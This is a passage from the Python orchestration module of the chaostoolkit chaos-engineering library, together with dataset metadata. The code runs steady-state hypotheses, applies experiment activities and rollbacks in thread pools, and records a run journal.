should_run_before_method(strategy: Strategy) -> bool:\n return strategy in [Strategy.BEFORE_METHOD, Strategy.DEFAULT, Strategy.CONTINUOUS]\n\n\ndef should_run_after_method(strategy: Strategy) -> bool:\n return strategy in [Strategy.AFTER_METHOD, Strategy.DEFAULT, Strategy.CONTINUOUS]\n\n\ndef should_run_during_method(strategy: Strategy) -> bool:\n return strategy in [Strategy.DURING_METHOD, Strategy.CONTINUOUS]\n\n\ndef run_gate_hypothesis(\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Dict[str, Any]:\n \"\"\"\n Run the hypothesis before the method and bail the execution if it did\n not pass.\n \"\"\"\n logger.debug(\"Running steady-state hypothesis before the method\")\n event_registry.start_hypothesis_before(experiment)\n state = run_steady_state_hypothesis(\n experiment, configuration, secrets, dry=dry, event_registry=event_registry\n )\n journal[\"steady_states\"][\"before\"] = state\n event_registry.hypothesis_before_completed(experiment, state, journal)\n if state is not None and not state[\"steady_state_met\"]:\n journal[\"steady_states\"][\"before\"] = state\n journal[\"status\"] = \"completed\"\n for probe in state.get(\"probes\", []):\n if probe[\"status\"] != \"succeeded\":\n journal[\"status\"] = \"failed\"\n break\n\n p = state[\"probes\"][-1]\n logger.fatal(\n \"Steady state probe '{p}' is not in the given \"\n \"tolerance so failing this experiment\".format(p=p[\"activity\"][\"name\"])\n )\n return\n return state\n\n\ndef run_deviation_validation_hypothesis(\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Dict[str, Any]:\n \"\"\"\n Run the hypothesis after the method and report to the journal if the\n experiment has deviated.\n \"\"\"\n logger.debug(\"Running steady-state hypothesis after the method\")\n event_registry.start_hypothesis_after(experiment)\n state = run_steady_state_hypothesis(\n experiment, configuration, secrets, dry=dry, event_registry=event_registry\n )\n journal[\"steady_states\"][\"after\"] = state\n event_registry.hypothesis_after_completed(experiment, state, journal)\n if state is not None and not state[\"steady_state_met\"]:\n journal[\"deviated\"] = True\n journal[\"status\"] = \"completed\"\n for probe in state.get(\"probes\", []):\n if probe[\"status\"] != \"succeeded\":\n journal[\"status\"] = \"failed\"\n break\n\n p = state[\"probes\"][-1]\n logger.fatal(\n \"Steady state probe '{p}' is not in the \"\n \"given tolerance so failing this \"\n \"experiment\".format(p=p[\"activity\"][\"name\"])\n )\n return state\n\n\ndef run_hypothesis_during_method(\n hypo_pool: ThreadPoolExecutor,\n continuous_hypo_event: threading.Event,\n strategy: Strategy,\n schedule: Schedule,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Future:\n \"\"\"\n Run the hypothesis continuously in a background thread and report the\n status in the journal when it raised an exception.\n \"\"\"\n\n def completed(f: Future):\n exc = f.exception()\n event_registry.continuous_hypothesis_completed(experiment, journal, exc)\n if exc is not None:\n if isinstance(exc, InterruptExecution):\n journal[\"status\"] = \"interrupted\"\n logger.fatal(str(exc))\n elif isinstance(exc, Exception):\n journal[\"status\"] = \"aborted\"\n logger.fatal(str(exc))\n logger.info(\"Continuous steady state hypothesis terminated\")\n\n f = hypo_pool.submit(\n run_hypothesis_continuously,\n continuous_hypo_event,\n schedule,\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry=dry,\n )\n f.add_done_callback(completed)\n return f\n\n\ndef run_method(\n strategy: Strategy,\n activity_pool: ThreadPoolExecutor,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Optional[List[Run]]:\n logger.info(\"Playing your experiment's method now...\")\n event_registry.start_method(experiment)\n try:\n runs = []\n journal[\"run\"] = runs\n apply_activities(\n experiment,\n configuration,\n secrets,\n activity_pool,\n journal,\n dry,\n event_registry,\n runs=runs,\n )\n event_registry.method_completed(experiment, runs)\n return runs\n except InterruptExecution:\n event_registry.method_completed(experiment)\n raise\n except Exception:\n journal[\"status\"] = \"aborted\"\n event_registry.method_completed(experiment)\n logger.fatal(\n \"Experiment ran into an un expected fatal error, \" \"aborting now.\",\n exc_info=True,\n )\n\n\ndef run_rollback(\n rollback_strategy: str,\n rollback_pool: ThreadPoolExecutor,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> None:\n has_deviated = journal[\"deviated\"]\n journal_status = journal[\"status\"]\n play_rollbacks = False\n if rollback_strategy == \"always\":\n logger.warning(\"Rollbacks were explicitly requested to be played\")\n play_rollbacks = True\n elif rollback_strategy == \"never\":\n logger.warning(\"Rollbacks were explicitly requested to not be played\")\n play_rollbacks = False\n elif rollback_strategy == \"default\" and journal_status not in [\n \"failed\",\n \"interrupted\",\n ]:\n play_rollbacks = True\n elif rollback_strategy == \"deviated\":\n if has_deviated:\n logger.warning(\n \"Rollbacks will be played only because the experiment \" \"deviated\"\n )\n play_rollbacks = True\n else:\n logger.warning(\n \"Rollbacks were explicitely requested to be played \"\n \"only if the experiment deviated. Since this is not \"\n \"the case, we will not play them.\"\n )\n\n if play_rollbacks:\n event_registry.start_rollbacks(experiment)\n try:\n journal[\"rollbacks\"] = apply_rollbacks(\n experiment, configuration, secrets, rollback_pool, dry, event_registry\n )\n except InterruptExecution as i:\n journal[\"status\"] = \"interrupted\"\n logger.fatal(str(i))\n except (KeyboardInterrupt, SystemExit):\n journal[\"status\"] = \"interrupted\"\n logger.warning(\n \"Received an exit signal.\"\n \"Terminating now without running the \"\n \"remaining rollbacks.\"\n )\n finally:\n event_registry.rollbacks_completed(experiment, journal)\n\n\ndef initialize_run_journal(experiment: Experiment) -> Journal:\n return {\n \"chaoslib-version\": __version__,\n \"platform\": platform.platform(),\n \"node\": platform.node(),\n \"experiment\": experiment.copy(),\n \"start\": datetime.utcnow().isoformat(),\n \"status\": None,\n \"deviated\": False,\n \"steady_states\": {\"before\": None, \"after\": None, \"during\": []},\n \"run\": [],\n \"rollbacks\": [],\n }\n\n\ndef get_background_pools(experiment: Experiment) -> ThreadPoolExecutor:\n \"\"\"\n Create a pool for background activities. The pool is as big as the number\n of declared background activities. If none are declared, returned `None`.\n \"\"\"\n method = experiment.get(\"method\", [])\n rollbacks = experiment.get(\"rollbacks\", [])\n\n activity_background_count = 0\n for activity in method:\n if activity and activity.get(\"background\"):\n activity_background_count = activity_background_count + 1\n\n activity_pool = None\n if activity_background_count:\n logger.debug(\n \"{c} activities will be run in the background\".format(\n c=activity_background_count\n )\n )\n activity_pool = ThreadPoolExecutor(activity_background_count)\n\n rollback_background_pool = 0\n for activity in rollbacks:\n if activity and activity.get(\"background\"):\n rollback_background_pool = rollback_background_pool + 1\n\n rollback_pool = None\n if rollback_background_pool:\n logger.debug(\n \"{c} rollbacks will be run in the background\".format(\n c=rollback_background_pool\n )\n )\n rollback_pool = ThreadPoolExecutor(rollback_background_pool)\n\n return activity_pool, rollback_pool\n\n\ndef get_hypothesis_pool() -> ThreadPoolExecutor:\n \"\"\"\n Create a pool for running the steady-state hypothesis continuously in the\n background of the method. The pool is not bounded because we don't know\n how long it will run for.\n \"\"\"\n return ThreadPoolExecutor(max_workers=1)\n\n\ndef run_hypothesis_continuously(\n event: threading.Event,\n schedule: Schedule,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n):\n frequency = schedule.continuous_hypothesis_frequency\n fail_fast_ratio = schedule.fail_fast_ratio\n\n event_registry.start_continuous_hypothesis(frequency)\n logger.info(\n \"Executing the steady-state hypothesis continuously \"\n \"every {} seconds\".format(frequency)\n )\n\n failed_iteration = 0\n failed_ratio = 0\n iteration = 1\n while not event.is_set():\n # already marked as terminated, let's exit now\n if journal[\"status\"] in [\"failed\", \"interrupted\", \"aborted\"]:\n break\n\n state = run_steady_state_hypothesis(\n experiment, configuration, secrets, dry=dry, event_registry=event_registry\n )\n journal[\"steady_states\"][\"during\"].append(state)\n event_registry.continuous_hypothesis_iteration(iteration, state)\n\n if state is not None and not state[\"steady_state_met\"]:\n failed_iteration += 1\n failed_ratio = (failed_iteration * 100) / iteration\n p = state[\"probes\"][-1]\n logger.warning(\n \"Continuous steady state probe '{p}' is not in the given \"\n \"tolerance\".format(p=p[\"activity\"][\"name\"])\n )\n\n if schedule.fail_fast:\n if failed_ratio >= fail_fast_ratio:\n m = \"Terminating immediately the experiment\"\n if failed_ratio != 0.0:\n m = \"{} after {:.1f}% hypothesis deviated\".format(\n m, failed_ratio\n )\n logger.info(m)\n journal[\"status\"] = \"failed\"\n break\n iteration += 1\n\n # we do not adjust the frequency based on the time taken by probes\n # above. We really want frequency seconds between two iteration\n # not frequency as a total time of a single iteration\n event.wait(timeout=frequency)\n\n\ndef apply_activities(\n experiment: Experiment,\n configuration: Configuration,\n secrets: Secrets,\n pool: ThreadPoolExecutor,\n journal: Journal,\n dry: Dry,\n event_registry: EventHandlerRegistry,\n runs: List[Run],\n) -> None:\n with controls(\n level=\"method\",\n experiment=experiment,\n context=experiment,\n configuration=configuration,\n secrets=secrets,\n ) as control:\n futures = []\n wait_for_background_activities = True\n\n try:\n for activity in run_activities(\n experiment,\n configuration,\n secrets,\n pool,\n dry,\n event_registry,\n runs,\n ):\n if isinstance(activity, Future):\n futures.append(activity)\n if journal[\"status\"] in [\"aborted\", \"failed\", \"interrupted\"]:\n break\n except SystemExit as x:\n # when we got a signal for an ungraceful exit, we can decide\n # not to wait for background activities. Their statuses will\n # remain failed.\n wait_for_background_activities = x.code != 30 # see exit.py\n raise\n finally:\n control.with_state(runs)\n\n if wait_for_background_activities and pool:\n logger.debug(\"Waiting for background activities to complete\")\n pool.shutdown(wait=True)\n elif pool:\n harshly_terminate_pending_background_activities(pool)\n logger.debug(\n \"Do not wait for the background activities to finish \"\n \"as per signal\"\n )\n\n for f in futures:\n try:\n if f.running():\n f.result(timeout=0.2)\n except TimeoutError:\n pass\n\n pool.shutdown(wait=False)\n\n\ndef apply_rollbacks(\n experiment: Experiment,\n configuration: Configuration,\n secrets: Secrets,\n pool: ThreadPoolExecutor,\n dry: Dry,\n event_registry: EventHandlerRegistry,\n) -> List[Run]:\n logger.info(\"Let's rollback...\")\n with controls(\n level=\"rollback\",\n experiment=experiment,\n context=experiment,\n configuration=configuration,\n secrets=secrets,\n ) as control:\n rollbacks = list(\n run_rollbacks(experiment, configuration, secrets, pool, dry, event_registry)\n )\n\n if pool:\n logger.debug(\"Waiting for background rollbacks to complete...\")\n pool.shutdown(wait=True)\n\n result = []\n for rollback in rollbacks:\n if not rollback:\n continue\n if isinstance(rollback, dict):\n result.append(rollback)\n else:\n result.append(rollback.result())\n\n control.with_state(result)\n\n return result\n\n\ndef has_steady_state_hypothesis_with_probes(experiment: Experiment) -> bool:\n steady_state_hypothesis = experiment.get(\"steady-state-hypothesis\")\n if steady_state_hypothesis:\n probes = steady_state_hypothesis.get(\"probes\")\n if probes:\n return len(probes) > 0\n return False\n\n\ndef harshly_terminate_pending_background_activities(pool: ThreadPoolExecutor) -> None:\n \"\"\"\n Ugly hack to try to force background activities to terminate now.\n\n This can only have an impact over functions that are still in the Python\n land. Any code outside of the Python VM (say calling a C function, even\n time.sleep()) will not be impacted and therefore will continue hanging\n until it does complete of its own accord.\n\n This could have really bizarre side effects so it's only applied when\n a SIGUSR2 signal was received.\n \"\"\"\n if not HAS_CTYPES:\n logger.debug(\n \"Your Python implementation does not provide the `ctypes` \"\n \"module and we cannot terminate very harshly running background \"\n \"activities.\"\n )\n return\n\n logger.debug(\n \"Harshly trying to interrupt remaining background activities still \" \"running\"\n )\n\n # oh and of course we use private properties... might as well when trying\n # to be ugly\n for thread in pool._threads:\n tid = ctypes.c_long(thread.ident)\n try:\n gil = ctypes.pythonapi.PyGILState_Ensure()\n ctypes.pythonapi.PyThreadState_SetAsyncExc(\n tid, ctypes.py_object(ExperimentExitedException)\n )\n finally:\n ctypes.pythonapi.PyGILState_Release(gil)\n", "repo_name": "chaostoolkit/chaostoolkit-lib", "sub_path": "chaoslib/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 34474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 77, "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 55, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 63, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 63, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 68, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 69, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 70, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 71, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 72, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 73, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 77, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 80, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 89, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 93, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 93, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 97, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 101, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 101, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 105, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 109, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 113, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 116, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 119, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 122, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 122, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 131, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 134, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 134, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 145, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 145, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 150, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 150, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 154, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 155, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 156, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 157, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 158, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 159, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 167, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 167, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 169, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 174, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 174, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 176, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 176, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 181, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 181, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 188, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 188, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 195, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 197, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 202, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 202, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 205, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 205, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 211, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 211, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 213, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 218, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 218, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 221, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 221, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 227, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 227, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 229, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 234, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 234, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 237, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 237, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 243, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 243, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 245, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 250, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 250, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 252, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 252, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 257, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 257, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 259, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 264, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 264, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 266, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 266, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 271, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 271, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 278, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 278, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 285, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 285, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 287, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 292, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 292, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 294, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 294, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 299, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 299, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy", "line_number": 303, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 303, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 305, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 311, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 319, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 320, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 321, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 321, "usage_type": "name"}, {"api_name": "chaoslib.settings.get_loaded_settings", "line_number": 324, "usage_type": "call"}, {"api_name": "chaoslib.configuration.load_configuration", "line_number": 325, "usage_type": "call"}, {"api_name": "chaoslib.secret.load_secrets", "line_number": 328, "usage_type": "call"}, {"api_name": "chaoslib.configuration.load_dynamic_configuration", "line_number": 331, "usage_type": "call"}, {"api_name": "chaoslib.types.Experiment", "line_number": 338, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 339, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 340, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 340, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 341, "usage_type": "name"}, {"api_name": "chaoslib.exit.exit_signals", "line_number": 344, "usage_type": "call"}, {"api_name": "chaoslib.types.Journal", "line_number": 342, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy", "line_number": 359, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 360, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 361, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 362, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 363, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 364, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 365, "usage_type": "name"}, {"api_name": "chaoslib.substitute", "line_number": 368, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 369, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 369, "usage_type": "name"}, {"api_name": "time.time", "line_number": 371, "usage_type": "call"}, {"api_name": "chaoslib.control.Control", "line_number": 375, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 378, "usage_type": "call"}, {"api_name": "chaoslib.types.Dry", "line_number": 381, "usage_type": "argument"}, {"api_name": "logzero.logger.warning", "line_number": 382, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 382, "usage_type": "name"}, {"api_name": "chaoslib.control.initialize_global_controls", "line_number": 383, "usage_type": "call"}, {"api_name": "chaoslib.control.initialize_controls", "line_number": 386, "usage_type": "call"}, {"api_name": "chaoslib.types.Strategy.DEFAULT", "line_number": 394, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 394, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 396, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 396, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 400, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 400, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.SKIP", "line_number": 405, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 405, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 408, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 408, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 412, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 412, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 467, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 469, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 469, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 473, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 473, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 477, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 477, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 481, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 481, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 500, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 500, "usage_type": "name"}, {"api_name": "time.time", "line_number": 501, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 515, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 515, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 517, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 517, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.ChaosException", "line_number": 527, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 528, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 528, "usage_type": "name"}, {"api_name": "chaoslib.control.cleanup_controls", "line_number": 531, "usage_type": "call"}, {"api_name": "chaoslib.control.cleanup_global_controls", "line_number": 532, "usage_type": "call"}, {"api_name": "chaoslib.types.Strategy", "line_number": 539, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.BEFORE_METHOD", "line_number": 540, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 540, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.DEFAULT", "line_number": 540, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy.CONTINUOUS", "line_number": 540, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 543, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.AFTER_METHOD", "line_number": 544, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 544, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.DEFAULT", "line_number": 544, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy.CONTINUOUS", "line_number": 544, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 547, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.DURING_METHOD", "line_number": 548, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 548, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.CONTINUOUS", "line_number": 548, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Experiment", "line_number": 552, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 553, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 554, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 555, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 557, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 563, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 563, "usage_type": "name"}, {"api_name": "chaoslib.hypothesis.run_steady_state_hypothesis", "line_number": 565, "usage_type": "call"}, {"api_name": "logzero.logger.fatal", "line_number": 579, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 579, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 558, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 588, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 589, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 590, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 591, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 593, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 599, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 599, "usage_type": "name"}, {"api_name": "chaoslib.hypothesis.run_steady_state_hypothesis", "line_number": 601, "usage_type": "call"}, {"api_name": "logzero.logger.fatal", "line_number": 615, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 615, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 594, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 594, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 624, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 625, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 626, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 627, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 628, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 629, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 630, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 631, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 633, "usage_type": "name"}, {"api_name": "concurrent.futures.Future", "line_number": 640, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 644, "usage_type": "argument"}, {"api_name": "logzero.logger.fatal", "line_number": 646, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 646, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 649, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 649, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 650, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 650, "usage_type": "name"}, {"api_name": "concurrent.futures.Future", "line_number": 634, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy", "line_number": 668, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", 